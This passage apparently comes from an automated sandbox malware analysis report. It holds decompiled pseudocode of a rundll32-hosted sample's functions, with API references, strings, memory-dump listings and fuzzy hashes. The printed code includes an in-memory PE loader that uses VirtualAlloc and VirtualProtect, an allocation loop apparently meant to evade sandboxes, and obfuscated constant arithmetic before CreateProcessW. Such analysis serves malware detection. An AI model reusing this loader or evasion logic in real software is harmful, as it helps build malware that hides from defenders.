				E10004F00(_v16, _v12, _v36);
				_t56 = E10002D20(0x10058ebc, _v12, _v36); // executed
				 *0x10058edc = _t56;
				ShowWindow(0, _v40);
				return 1;
			}

APIs

Part of subcall function 10008860: _malloc.LIBCMT ref: 1000886B

_printf.LIBCMT ref: 1000896B
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00024E00,00000000,00000000,00000000), ref: 10008A2B
VirtualAlloc.KERNEL32(00000000,00024E00,00000000,00000000), ref: 10008A5D
_malloc.LIBCMT ref: 10008A82
ShowWindow.USER32(00000000,0044368D,00000000,00024E00), ref: 10008AD1

Strings

ntdll.dll, xrefs: 100089BB
kernel32.dll, xrefs: 100089AB
`/, xrefs: 1000898F
+';, xrefs: 10008988
vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp, xrefs: 10008A8F
8192, xrefs: 10008A10, 10008A44

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual_malloc$NumaShowWindow_printf
String ID: +';$8192$`/$kernel32.dll$ntdll.dll$vzyxQQjtnPpM1kMtP2^c)toAOgGzJnA(x4n)mZV?Zgqbqls>&28Kb303hUncVaad@?N*A%W2eBhDNd+m_Bl2cFznqh*vrDpHPGj%?_!pbLp
API String ID: 1487653210-3670691644
Opcode ID: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction ID: 74e036033439e47f0f6271ee42a165f027743cdfe4c2c4d01037afcb8f86e406
Opcode Fuzzy Hash: 230bbdfcd20e835c4d7365e9bc9cc9309c602f396e76a36ffbf0d77b2387037d
Instruction Fuzzy Hash: FE5141F5D00214AFEB00CF90EC96BAE77B4FB48344F144528E909BB345E775A6448BA2

Uniqueness

Uniqueness Score: -1.00%

Function 10013A9B, Relevance: 16.6, APIs: 11, Instructions: 103
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E10013A9B() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x1005aaa8
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x3520680
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100134F9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100134F9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E100174D0(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x3520680
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x10057168;
							E10017C83( &_v28, 0x1002e258);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10057200;
							E10017C83( &_v36, 0x1002e2b8);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10057298;
							E10017C83( &_v44, 0x1002e2fc);
							asm("int3");
							_push(4);
							E10017BC1(E10027DEC, _t69, _t82, _t86);
							_t78 = E10013965(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000CF71(_t78);
							}
							return E10017C60(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x3520680
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x3520680
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x3520680
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013AAA
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10013B00
GlobalHandle.KERNEL32(03520680), ref: 10013B09
GlobalUnlock.KERNEL32(00000000,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B12
GlobalReAlloc.KERNEL32 ref: 10013B29
GlobalHandle.KERNEL32(03520680), ref: 10013B3B
GlobalLock.KERNEL32 ref: 10013B42
LeaveCriticalSection.KERNEL32(?,?,?,?,?,1005AA8C,10013DEC,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004), ref: 10013B4C
GlobalLock.KERNEL32 ref: 10013B58
_memset.LIBCMT ref: 10013B71
LeaveCriticalSection.KERNEL32(?), ref: 10013B9D

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
String ID:
API String ID: 496899490-0
Opcode ID: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction ID: d2dedea389880cd6532a8cc41d1f31ca5a81082a511f3f96b23d25218acb7329
Opcode Fuzzy Hash: db40230195121c03edd1d9de773089a9b398076d37fb16ef380e98a53d4696a6
Instruction Fuzzy Hash: 5F31C1312043129FE720CF34CC8DA2A77E9FF84280B12891DE996C7651EB30F885CB10

Uniqueness

Uniqueness Score: -1.00%

Function 10016380, Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 27%

			E10016380(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x1002f780);
				_t8 = E1001984C(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10019891(_t8);
				}
				if( *0x1005c984 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x1005ad4c); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10017D62(_t31);
						 *_t10 = E10017D27(GetLastError());
					}
					goto L9;
				}
				E1001A549(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E1001A5C2(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1001A5ED();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E100163D6();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}

APIs

__lock.LIBCMT ref: 1001639E

Part of subcall function 1001A549: __mtinitlocknum.LIBCMT ref: 1001A55D
Part of subcall function 1001A549: __amsg_exit.LIBCMT ref: 1001A569
Part of subcall function 1001A549: EnterCriticalSection.KERNEL32(00000001,00000001,?,1001C014,0000000D,1002FA58,00000008,1001C106,00000001,?,?,00000001,?,?,10017AE8,00000001), ref: 1001A571

___sbh_find_block.LIBCMT ref: 100163A9
___sbh_free_block.LIBCMT ref: 100163B8
RtlFreeHeap.NTDLL(00000000,?,1002F780,0000000C,1001BF6A,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562), ref: 100163E8
GetLastError.KERNEL32(?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001,00000001,?,1001C014,0000000D,1002FA58), ref: 100163F9

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction ID: 632ebcc47bfd7d50c2ae726889ea94072d2ceb4c664f4e9832d4c107bd8c1e1e
Opcode Fuzzy Hash: 933a214dfe2b721a1172918ae6127c9818b4b1158d9b2876c596c2397cc5b652
Instruction Fuzzy Hash: EE01D635805326EBEF20DBB4AC0AB9D3BF4EF053A0F214109F554AE091CB34EAC19A64

Uniqueness

Uniqueness Score: -1.00%

Function 05022C24, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 51%

			E05022C24(WCHAR* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a20, int _a24, intOrPtr _a28, struct _STARTUPINFOW* _a32, intOrPtr _a40, intOrPtr _a44, WCHAR* _a52, struct _PROCESS_INFORMATION* _a56) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				intOrPtr _v32;
				void* _t49;
				int _t56;
				WCHAR* _t60;

				_push(_a56);
				_t60 = __ecx;
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(0);
				_push(__ecx);
				E0501FE29(_t49);
				_v32 = 0x534833;
				_v28 = 0;
				_v24 = 0;
				_v8 = 0x70adbe;
				_v8 = _v8 >> 5;
				_v8 = _v8 << 0xa;
				_v8 = _v8 | 0x1d11c356;
				_v8 = _v8 ^ 0x1f145645;
				_v20 = 0xecea8a;
				_v20 = _v20 | 0x5baa72b8;
				_v20 = _v20 ^ 0x5be1d11d;
				_v16 = 0x76217f;
				_v16 = _v16 >> 0x10;
				_v16 = _v16 | 0xe98780dc;
				_v16 = _v16 ^ 0xe98c1e91;
				_v12 = 0xeb975;
				_v12 = _v12 ^ 0xd8138edb;
				_v12 = _v12 | 0x0b4171d5;
				_v12 = _v12 ^ 0xdb5d9300;
				E0500EB52(__ecx, __ecx, 0xb7160725, 0x75, 0xa2289af1);
				_t56 = CreateProcessW(_a52, _t60, 0, 0, _a24, 0, 0, 0, _a32, _a56); // executed
				return _t56;
			}

0x05022c2c
0x05022c31
0x05022c33
0x05022c36
0x05022c37
0x05022c3a
0x05022c3d
0x05022c3e
0x05022c41
0x05022c44
0x05022c47
0x05022c4a
0x05022c4b
0x05022c4e
0x05022c4f
0x05022c51
0x05022c52
0x05022c57
0x05022c61
0x05022c64
0x05022c67
0x05022c6e
0x05022c72
0x05022c76
0x05022c7d
0x05022c84
0x05022c8b
0x05022c92
0x05022c99
0x05022ca0
0x05022ca4
0x05022cab
0x05022cb2
0x05022cb9
0x05022cc0
0x05022cc7
0x05022ce8
0x05022d02
0x05022d09

APIs

CreateProcessW.KERNELBASE(?,2E751909,00000000,00000000,00534833,00000000,00000000,00000000,?,?), ref: 05022D02

Strings

3HS, xrefs: 05022C57

Memory Dump Source

Source File: 00000004.00000002.247759843.0000000005001000.00000020.00000001.sdmp, Offset: 05000000, based on PE: true

Associated: 00000004.00000002.247755060.0000000005000000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.247793384.0000000005026000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_5000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: 3HS
API String ID: 963392458-330188696
Opcode ID: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction ID: 8c3db92ca22aaa2947b00c72bceb34db7eef6833abed4b2cbb4a5b1a418759d1
Opcode Fuzzy Hash: b0049691a906c617faab48a03f019d00495406e067b30e8a3afe4c22a13f3ee0
Instruction Fuzzy Hash: 3121F372900248BBCF159F96DC0ACDFBFB9EF95740F108188F915A2220C3B58A24DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 100021D0, Relevance: 3.1, APIs: 2, Instructions: 98
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E100021D0(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				long _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				int _t67;

				_v28 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						asm("sbb ecx, ecx");
						_v16 =  ~( ~(_a8[3] & 0x20000000));
						asm("sbb eax, eax");
						_v24 =  ~( ~(_a8[3] & 0x40000000));
						asm("sbb edx, edx");
						_v12 =  ~( ~(_a8[3] & 0x80000000));
						_t39 = _v24 * 8; // 0x10056f20
						_v20 =  *((intOrPtr*)((_v16 << 4) + _t39 + 0x10056f20 + _v12 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v20 = _v20 | 0x00000200;
						}
						_t67 = VirtualProtect( *_a8, _a8[2], _v20,  &_v8); // executed
						if(_t67 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 == _a8[1] && (_a8[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x30) || _a8[2] %  *(_a4 + 0x30) == 0)) {
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
					}
					return 1;
				}
				return 1;
			}

APIs

VirtualFree.KERNELBASE(00000000,?,00004000,?,10002468,00000001,00000000,?,10002C68,?,?,?,?,10002C68,00000000,00000000), ref: 10002244

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction ID: def7816fd77fd5aef653724919a03fde70f7e86383ff2ba96e4cf8bb5acc80b5
Opcode Fuzzy Hash: 47f32b032b7fce0672a30d9b107070a1881b22e5365e79d9d7a5c7562cbc9459
Instruction Fuzzy Hash: 5A41B674600109AFEB44CF98C890BA9B7B6FB88350F25C659EC1A9F395C731EE41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1001A305, Relevance: 3.0, APIs: 2, Instructions: 28
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1001A305(intOrPtr _a4) {
				void* _t6;
				intOrPtr _t7;
				void* _t10;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1005ad4c = _t6;
				if(_t6 != 0) {
					_t7 = E1001A2AA(__eflags);
					__eflags = _t7 - 3;
					 *0x1005c984 = _t7;
					if(_t7 != 3) {
						L5:
						__eflags = 1;
						return 1;
					} else {
						_t10 = E1001A57A(0x3f8);
						__eflags = _t10;
						if(_t10 != 0) {
							goto L5;
						} else {
							HeapDestroy( *0x1005ad4c);
							 *0x1005ad4c =  *0x1005ad4c & 0x00000000;
							goto L1;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,1001796A,00000001,?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C), ref: 1001A316
HeapDestroy.KERNEL32(?,?,00000001,?,?,10017AE8,00000001,?,?,1002F840,0000000C,10017BA2,?), ref: 1001A34C

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction ID: 8ebff57b685a6f4636b50d0b354dfd0ee4d70228ae444a146c3f0929ed30e208
Opcode Fuzzy Hash: 2498113e0f0cb93b929c98f8b50cab2ed5fb389832bb0c331937e648ce874443
Instruction Fuzzy Hash: 93E06D71A193569EFB10AB308C9972536F4EB46386F104826F911CD4A0F7B0C6C09A01

Uniqueness

Uniqueness Score: -1.00%

Function 10002010, Relevance: 2.6, APIs: 2, Instructions: 115
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10002010(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				long _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0x104e9
				_v20 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x4a8bb445
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x10002c17
				_v24 =  *_a16 + _t9;
				_v8 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000001
					if(_v8 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v24 + 0x10) != 0) {
						_t41 = _v24 + 0x14; // 0x4a8bb445
						_t43 = _v24 + 0x10; // 0x8b118bbc
						if(E10001FE0(_v28, _a8,  *_t41 +  *_t43) != 0) {
							_t47 = _v24 + 0x10; // 0x8b118bbc
							_t50 = _v24 + 0xc; // 0x4d8b0000
							_t76 = VirtualAlloc(_v20 +  *_t50,  *_t47, 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_t55 = _v24 + 0xc; // 0x4d8b0000
								_v12 = _v20 +  *_t55;
								_t58 = _v24 + 0x10; // 0x8b118bbc
								_t61 = _v24 + 0x14; // 0x4a8bb445
								E10001E60(_v12, _a4 +  *_t61,  *_t58);
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t28 = _v24 + 0xc; // 0x4d8b0000
					_v12 = VirtualAlloc(_v20 +  *_t28, _v16, 0x1000, 4);
					if(_v12 != 0) {
						_t33 = _v24 + 0xc; // 0x4d8b0000
						_v12 = _v20 +  *_t33;
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E10001E10(_v12, 0, _v16);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}

APIs

VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,10002BFF,00000000), ref: 10002091
VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10008AC6,8B118BBC,?,10002BFF,00000000,10008AC6,?), ref: 1000210C

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction ID: c265c5d024e1aaa08d03296b5d335ffe068feccc9d90f6e2fd2d76d71ec68577
Opcode Fuzzy Hash: 1f005b19e3c441fc20b6c29efe2afaeec2d3b558fdbd29b30d99f40439f16acf
Instruction Fuzzy Hash: 4E51DEB4A0020ADFDB04CF94C591AAEB7F1FF48344F208598E915AB355D771EE91CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10008860, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E10008860(void* __eflags) {
				char* _v8;
				intOrPtr _v12;
				char _v16;
				char* _v20;
				void* __ebp;
				void* _t25;
				void* _t29;
				intOrPtr _t32;
				void* _t33;
				void* _t34;

				_v8 = E1001703B(_t25, _t29, _t33, _t34, 0x5f5e100);
				if(_v8 != 0) {
					_v12 = 0x5f5e100;
					_v16 = 0;
					_v20 = _v8;
					while(1) {
						__eflags = _v16 - 0x5f5e100;
						if(__eflags >= 0) {
							break;
						}
						 *_v20 = _v16;
						_v16 = _v16 + 1;
						_t32 = _v20 + 1;
						__eflags = _t32;
						_v20 = _t32;
					}
					_push(_v8); // executed
					E10016380(_t25, _t33, _t34, __eflags); // executed
					__eflags = _v16 - _v12;
					if(_v16 != _v12) {
						return 3;
					}
					return 0;
				}
				return 3;
			}

APIs

_malloc.LIBCMT ref: 1000886B

Part of subcall function 1001703B: __FF_MSGBANNER.LIBCMT ref: 1001705E
Part of subcall function 1001703B: __NMSG_WRITE.LIBCMT ref: 10017065
Part of subcall function 1001703B: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1001E73B,?,00000001,00000001,1001A4D3,00000018,1002F8C0,0000000C,1001A562,00000001), ref: 100170B3

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction ID: 9e6909d06ecd8ca97a2f758cde8d66f904c366c92fb4d9c13ba1bad92c8ee0bf
Opcode Fuzzy Hash: 40bd655b06e48b04370c20bd75be719fcb86c010ff12dc3827a327f63544bac9
Instruction Fuzzy Hash: 9A0178B4D0424CEFEB00CFA4C8446AEBBB4FB04354F60C8A9D9516B349E735AB00DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0501D11A, Relevance: 1.5, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0501D11A() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t39;

				_v24 = _v24 & 0x00000000;
				_v36 = 0x78f5c7;
				_v32 = 0xa12bb9;
				_v28 = 0x4eca09;
				_v8 = 0x8b256f;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x4a7d0011;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00073d60;
				_v20 = 0x1e549a;
				_v20 = _v20 + 0xffffad33;
				_v20 = _v20 ^ 0x00134b4f;
				_v16 = 0x8dd9dd;
				_v16 = _v16 << 3;
				_v16 = _v16 ^ 0x0460bc3c;
				_v12 = 0x358059;
				_v12 = _v12 + 0xb97b;
				_v12 = _v12 ^ 0x003502df;
				E0500EB52(_t39, _t39, 0x83891850, 0x1c, 0xa2289af1);
				ExitProcess(0);
			}

0x0501d120
0x0501d124
0x0501d12b
0x0501d132
0x0501d139
0x0501d140
0x0501d144
0x0501d14b
0x0501d14f
0x0501d156
0x0501d15d
0x0501d164
0x0501d16b
0x0501d172
0x0501d176
0x0501d17d
0x0501d184
0x0501d18b
0x0501d1ac
0x0501d1b6

APIs

ExitProcess.KERNEL32(00000000), ref: 0501D1B6

Memory Dump Source

Source File: 00000004.00000002.247759843.0000000005001000.00000020.00000001.sdmp, Offset: 05000000, based on PE: true

Associated: 00000004.00000002.247755060.0000000005000000.00000004.00000001.sdmp Download File
